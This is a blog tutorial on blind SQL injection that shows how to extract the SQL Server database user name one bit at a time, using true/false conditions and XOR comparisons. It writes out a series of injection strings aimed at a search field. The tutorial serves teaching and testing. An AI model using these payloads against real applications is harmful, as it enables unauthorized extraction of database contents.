RSS

Tag Archives: sqli

Blind Sql Injection – Data Extraction Part 1

Article below will provide you with overview of how to extract data when any application has blind sql injection vulnerability.

Assuming that, you already have some knowledge on Sql Injection ( SQLi ) and identifying sql injection. I will jump straight to the data extraction.

As you all know SQL Injection is attack where user provided sql statements can executed to perform unintented operation, blah blah… For proper defination, please refer OWASP Website. 🙂

In blind sql injection, an attacker can inject sql statements and steal data by asking a series of True or False questions through Sql Statements.

Example:

Let us suppose a application takes the user input and tries to build a sql query as below

Sqlquery = “select * from users where username = ‘” + txtusername.text + “’”            

If the user enters “john’ and 1=1–“ ( no double quotes in input )

The final query will look something like this

select * from users where username = ‘john’ and 1=1–

this will still return the results for user john.

In the above example if the user enters “john’ and 1=0” in the search text box then the query will be:  select * from users where username = ‘john’ and 1=0–

So here we have 2 queries, one of them will return the data for user “john” and another will not. Using these 2 conditions the user will be able to extract the data from the database.

Data Extraction

Now question comes, how can we extract data from database by just using true or false conditions.  To answer that, first we need to get understanding of how computers handle data internally.

In computer, all the data is handled in 1’s and 0’s i.e binary. Character “A” is represented by ascii value 65. Binary representation of 65 is 01000001

In Blind Sql injection, we try to determine the value of each bit with one request and try to construct the character after we get all the 8 bits value. So we need 8 requests in here to get one character from database.

Let us see how we perform this to get the information.

Assuming that we are working on Sql Server database and want to extract the database user name under which the sql queries and being run.

Sql server provides built in variable to get this information, it can be retrieved by using

Select user query.

Let us assume that the above query will return “scott” ( this is just for better understanding, in actual we will not be knowing what the query will return )

To get the first character of user the query can be written as below

select substring(user,1,1)

I got the first character, now how to get the ascii value to first character?

select ascii(substring(user,1,1))

ascii value of “s” is 115. Binary representation is 01110011

we try to do some exclusive or operations on the ascii value and see what the results are:

115 XOR 1 = 114  ( 01110010 )

115 XOR 2 = 113 ( 01110001)

115 XOR 4 = 119 ( 01110111)

115 XOR 8 = 123 ( 01111011)

115 XOR 16 = 99 ( 01100011)

115 XOR 32 = 83 ( 01010011)

115 XOR 64 = 51 ( 00110011)

115 XOR 128 = 243 (11110011)

The reason we have taken 1,2,4,8 etc for XOR here is that, if you see the binary representation of these numbers, they will have 0’s in all the positions except one and that position will determine the bit position for which we are trying to retrieve the bit value.

If you observe the XOR output above, you will see that whenever the actual ascii value had 1 in the bit position then the final XORed value has decreased than 115 and when the bit value is 0 then the XORed value has increased more than 115. Based  on the above inference I can build my query as

select case when ascii(substring(user,1,1)) ^ 1 > ascii(substring(user,1,1)) then 0 else 1 end

^ denotes XOR operation in Sql Server.

So in the search field in the application we will enter following search string

john’ and 1= select case when ascii(substring(user,1,1)) ^ 1 > ascii(substring(user,1,1)) then 0 else 1 end–

if you see the condition above, 1=0 or 1=1 condition in the query will depend on the bit value of the
data that we are trying to retrieve.

If we send the below search strings to database

john’ and 1= select case when ascii(substring(user,1,1)) ^ 1 > ascii(substring(user,1,1)) then 0 else 1 end–

john’ and 1= select case when ascii(substring(user,1,1)) ^ 2 > ascii(substring(user,1,1)) then 0 else 1 end–

john’ and 1= select case when ascii(substring(user,1,1)) ^ 4 > ascii(substring(user,1,1)) then 0 else 1 end–

john’ and 1= select case when ascii(substring(user,1,1)) ^ 8 > ascii(substring(user,1,1)) then 0 else 1 end–

john’ and 1= select case when ascii(substring(user,1,1)) ^ 16 > ascii(substring(user,1,1)) then 0 else 1 end–

john’ and 1= select case when ascii(substring(user,1,1)) ^ 32 > ascii(substring(user,1,1)) then 0 else 1 end–

john’ and 1= select case when ascii(substring(user,1,1)) ^ 64 > ascii(substring(user,1,1)) then 0 else 1 end–

john’ and 1= select case when ascii(substring(user,1,1)) ^ 128 > ascii(substring(user,1,1)) then 0 else 1 end—

we should be able to determine all the 8 bits, once we retrieve all the 8 bits then we can get the ascii value and from ascii value get the character.

Once we get the first character we can tweak the substring function to substring(user,2,1) to get the 2nd character and repeat the steps.

In this fashion we can do bit by bit data extraction from the database. So need to have lot’s of patience…next part is going to cover the quick way of data extraction…wait for part 2  🙂

 

Posted by on January 31, 2012 in web application hacking

1 Comment

Tags: , , , , ,